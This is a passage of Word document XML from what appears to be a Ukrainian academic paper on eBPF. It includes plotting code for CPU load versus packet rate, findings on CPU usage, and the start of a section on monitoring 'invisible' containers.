      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>залежно</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>від</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>кількості</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>пакетів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xlabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Кількість</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>пакетів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на секунду (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ylabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Навантаження</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="007A4DA9" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.grid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="007A4DA9" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="002D2F83" w:rsidRDefault="002D2F83" w:rsidP="005B2A6E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D2F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Ці графіки дозволяють візуально оцінити, як зміни в різних параметрах (таких як кількість тактів процесора на пакет або кількість пакетів, що обробляються за секунду) можуть впливати на продуктивність системи, включаючи затримку, пропускну здатність і навантаження на процесор. </w:t>
      </w:r>
      <w:r w:rsidR="00E20601">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Враховуючи наведене є</w:t>
      </w:r>
      <w:r w:rsidRPr="002D2F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> мож</w:t>
      </w:r>
      <w:r w:rsidR="00E20601">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ливість, в залежності від потреб,</w:t>
      </w:r>
      <w:r w:rsidRPr="002D2F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> налаштувати ці графіки під конкретні умови системи для отримання більш точних результатів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008760A0" w:rsidRDefault="00F52DE5" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В результаті проведеного дослідження було </w:t>
      </w:r>
      <w:r w:rsidR="00683544" w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>засвідчено</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, що програма </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> може використовувати до 100% потужності одного ядра процесора при максимальному навантаженні. У реальних системах, де </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> обробляє пакети паралельно з іншими процесами, навантаження на CPU може бути дещо меншим. Однак для одиничного процесора розрахунок дає орієнтовну максимальну оцінку, яка є важливою для оцінки продуктивності та планування ресурсів у системах, де використовується ця технологія. Ці результати </w:t>
      </w:r>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">підкреслюють необхідність ретельного аналізу впливу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F52DE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на загальну продуктивність системи для досягнення оптимальної ефективності.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008760A0" w:rsidRDefault="008760A0" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B47E54" w:rsidRPr="00B47E54" w:rsidRDefault="00B47E54" w:rsidP="00B47E54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. Практичне застосування </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для невидимих контейнерів</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47E54" w:rsidRDefault="00B47E54" w:rsidP="00A80F8E">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A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00A80F8E" w:rsidP="00A80F8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В проведеному</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> дослідженні розглядаєть</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ся використання технології </w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">для моніторингу та керування контейнерами, які не мають прямої взаємодії з користувачем або стандартними інтерфейсами керування контейнерами, таких як Docker чи Kubernetes. </w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Це особливо актуально для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>невидимих</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> контейнерів, які можуть бути частиною складних інфраструктур, де їх діяльність не завжди можна спостерігати за допомогою звичайних засобів моніторингу</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [27]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="0042687A" w:rsidP="00A80F8E">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42687A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Слід зауважити, що</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> це контейнери, які використовуються в середовищах, де вони не мають явної точки взаємодії з користувачем або </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, як у випадку з мікросервісами, функціями без сервера чи іншими спеціалізованими середовищами. Вони можуть бути створені та знищені автоматично, виконувати специфічні задачі в межах іншої системи без потреби в явному інтерфейсі або управлінні з боку кінцевого користувача</w:t>
      </w:r>
      <w:r w:rsidRPr="0042687A">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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, - [28</w:t>
      </w:r>
